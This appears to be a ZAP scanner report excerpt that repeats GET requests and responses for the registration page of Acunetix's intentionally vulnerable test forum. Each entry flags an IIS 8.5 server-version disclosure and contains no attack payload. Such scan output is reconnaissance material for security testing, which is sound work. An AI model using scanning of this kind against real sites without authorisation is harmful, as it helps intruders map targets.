| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
